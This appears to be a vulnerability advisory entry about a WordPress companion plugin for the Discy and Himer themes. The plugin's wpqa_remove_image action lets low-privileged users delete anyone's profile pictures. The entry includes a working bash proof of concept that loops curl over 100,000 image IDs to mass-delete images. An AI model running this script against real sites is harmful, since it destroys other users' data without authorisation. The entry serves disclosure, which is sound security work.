The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the ajax action wpqa_remove_image belongs to the requesting user, allowing any users (with privileges as low as Subscriber) to delete the profile pictures of any other user.
#!/bin/bash nonce=aae369a8e3 for i in {1..100000}; do curl 'https://vulnerable.website/wp-admin/admin-ajax.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: something=something' --data-raw 'action=wpqa_remove_image&wpqa_remove_image='$nonce'&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id='$i; done
Binit Ghimire
Binit Ghimire
Yes
2022-04-21 (about 1 years ago)
2022-04-21 (about 1 years ago)
2022-04-22 (about 1 years ago)